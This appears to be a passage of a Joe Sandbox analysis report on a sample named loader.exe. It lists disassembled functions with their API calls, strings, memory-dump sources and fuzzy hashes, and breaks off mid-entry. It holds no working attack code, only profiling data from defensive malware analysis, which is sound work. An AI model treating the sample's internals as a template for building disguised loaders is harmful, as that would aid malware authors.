                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1$xzh
                                                                                    • API String ID: 445417207-1351821969
                                                                                    • Opcode ID: 6ea25b16cfd4d3dfb9964cfd2b2adfdffd802517dc9b121bb97a607673f48cd1
                                                                                    • Instruction ID: 01a6bc43fbc8eb0a0a8e3a0f7329ca78396801153769666b808f0cdc3462cc87
                                                                                    • Opcode Fuzzy Hash: 6ea25b16cfd4d3dfb9964cfd2b2adfdffd802517dc9b121bb97a607673f48cd1
                                                                                    • Instruction Fuzzy Hash: 8E110432900128B6DB229F64DC49FFF377FEF0A700F000021FA45B6284C7A0DA0197A1
                                                                                    Function 0063B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0063B9B8
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063B9D6
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063B9E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    • Opcode ID: adbe93751cc62ff75f3605f853f0b97977925facd5f3d8e5148afb53b0dca22a
                                                                                    • Instruction ID: bf12268b0612a95dd72dad9cdb3f4f914a92ab60c900de5ada0cbebcf2fab6c3
                                                                                    • Opcode Fuzzy Hash: adbe93751cc62ff75f3605f853f0b97977925facd5f3d8e5148afb53b0dca22a
                                                                                    • Instruction Fuzzy Hash: 23014523500312799A706B358C42DABA3EEEE82770F44940EFA44D7282EB20D804C2F1
                                                                                    Function 0064B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 0064B6ED
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0064B712
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064B744
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064B767
                                                                                      • Part of subcall function 0064A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0064A762
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                                    • String ID: ]
                                                                                    • API String ID: 3658976889-3352871620
                                                                                    • Opcode ID: 16d77dec654dbafca869142af98852e626152163a106be4d3ba2b06ab7a6dffb
                                                                                    • Instruction ID: b3dcd03c80f309a515d580e8de96ec9dd31818bba52c6179c94827c9742a87e3
                                                                                    • Opcode Fuzzy Hash: 16d77dec654dbafca869142af98852e626152163a106be4d3ba2b06ab7a6dffb
                                                                                    • Instruction Fuzzy Hash: 8601D23658021177CB127BB49C0AABF7ABF9FC1B52F091019F900A7391DF61CD0543A1
                                                                                    Function 0064D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064D64B
                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0064D661
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0064D675
                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0064D684
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    • Opcode ID: d745653ea518bd3b59505fe4ffd8b2e34dbf798ddc26030a046d88478b6c5a90
                                                                                    • Instruction ID: 33308b684b6efccad761b1eb4c0b330bc94989bcd27df0a5879a59328ad66f38
                                                                                    • Opcode Fuzzy Hash: d745653ea518bd3b59505fe4ffd8b2e34dbf798ddc26030a046d88478b6c5a90
                                                                                    • Instruction Fuzzy Hash: 5A014C33A85310BBD3104F649D09F9B776FEB5BB01F020511F305A61D0C7A29A158779
                                                                                    Function 00652BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2252061734-0
                                                                                    • Opcode ID: bb5fbae629ffd87313a8d743678a6ea080e860c9dc4df3e7ba88731e3f774c26
                                                                                    • Instruction ID: efb242f599600531108d4407b61363fef803e471f7d3a3259ddb4b3ed70e0d2d
                                                                                    • Opcode Fuzzy Hash: bb5fbae629ffd87313a8d743678a6ea080e860c9dc4df3e7ba88731e3f774c26
                                                                                    • Instruction Fuzzy Hash: 2451E372600213AFDB698F14D865BAA73B7FF16312F24422DEC05476A2E731ED89D790
                                                                                    Function 0065C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0065C817
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065C829
                                                                                    • _free.LIBCMT ref: 0065C83B
                                                                                    • _free.LIBCMT ref: 0065C84D
                                                                                    • _free.LIBCMT ref: 0065C85F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    • Opcode ID: 6134d340ea8fa3d40b9c9be63a042a52e2fe8b0220aa6da183790c4b093d1792
                                                                                    • Instruction ID: 44329daa75a000457a9fabb838b416b4ac303ca0dfff31884ad532d591f6edd9
                                                                                    • Opcode Fuzzy Hash: 6134d340ea8fa3d40b9c9be63a042a52e2fe8b0220aa6da183790c4b093d1792
                                                                                    • Instruction Fuzzy Hash: 58F04F36500604AFC760DB68E885C4677FBAF10726F54281DF908E7A52CAB2FC888A54
                                                                                    Function 00658900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0065891E
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 00658930
                                                                                    • _free.LIBCMT ref: 00658943
                                                                                    • _free.LIBCMT ref: 00658954
                                                                                    • _free.LIBCMT ref: 00658965
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    • Opcode ID: 54978c94fb5057aede420d6a7c278ea1adb2e06619ee5501eebdebb904cc684e
                                                                                    • Instruction ID: 2e42a0c6fa3929912ec025f92dc5cf6f41a2a422dc609b38ffd9f9633dd53f28
                                                                                    • Opcode Fuzzy Hash: 54978c94fb5057aede420d6a7c278ea1adb2e06619ee5501eebdebb904cc684e
                                                                                    • Instruction Fuzzy Hash: A2F01775811127AF87866F18FC124053BBBBB24711710260BF81463EB2DB764A49DB85
                                                                                    Function 006415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    • Opcode ID: 8af3e0857b6f0bc5d9bc04005e4e0479c7f4b1f1f56db631f1545e27c145ca21
                                                                                    • Instruction ID: b6e79b12419eed42e85ec95fb8b0e9369994fa13bdbcefaed4947e07c11c3122
                                                                                    • Opcode Fuzzy Hash: 8af3e0857b6f0bc5d9bc04005e4e0479c7f4b1f1f56db631f1545e27c145ca21
                                                                                    • Instruction Fuzzy Hash: F551E835388300FAF7212AA48D47F757667AB07B04F25450BF3966C4E1DAA3E4D2A71E
                                                                                    Function 0063BB03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 176396367-253988292
                                                                                    • Opcode ID: 98c64aa45f6dc6e0c45c9da7fac6453fe53a1260b16a8d74072ef18ecb7f4d40
                                                                                    • Instruction ID: a9a3d8730b7d9967062365b34e70574ab15a68b816117e544e2b5ca999e1ccd2
                                                                                    • Opcode Fuzzy Hash: 98c64aa45f6dc6e0c45c9da7fac6453fe53a1260b16a8d74072ef18ecb7f4d40
                                                                                    • Instruction Fuzzy Hash: 7141C631400225A6DF31AF60CC41EEA77ABAF41390F006529FA55E3251EF70DE90CBD4
                                                                                    Function 00657F6E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: (!i$C:\Users\user\Desktop\loader.exe
                                                                                    • API String ID: 269201875-3028609708
                                                                                    • Opcode ID: ba54da5e6cbc549fa1b7a52577b38d4bccccf447f0d4549ba2dc9dba5cb299bf
                                                                                    • Instruction ID: 309eda1ee17bef6326a40bb631e21b9dc44e138f025ec6fe23985ef4a395ca13
                                                                                    • Opcode Fuzzy Hash: ba54da5e6cbc549fa1b7a52577b38d4bccccf447f0d4549ba2dc9dba5cb299bf
                                                                                    • Instruction Fuzzy Hash: 5631C070A00219AFCB21DF94DC849AEBBBEEF84301F10406AFD04A7651DA708E49CBA0
                                                                                    Function 0064AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064AD98
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0064ADAD
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0064ADC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: 9764fcd935fce1d0786b4d450a26279a5b120ab438ca0da49fca5e29238bebe6
                                                                                    • Instruction ID: e41c06d5c92d9f6b54e224af63cd7342f31e0bea5413652b74b75e3ff0c9041b
                                                                                    • Opcode Fuzzy Hash: 9764fcd935fce1d0786b4d450a26279a5b120ab438ca0da49fca5e29238bebe6
                                                                                    • Instruction Fuzzy Hash: 2811B132AC0210BFD7119FA89C05FAA3B6FEF4B702F100011F241EBAA0C7629905D766
                                                                                    Function 0064DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010406,0064B270,?,?), ref: 0064DE18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
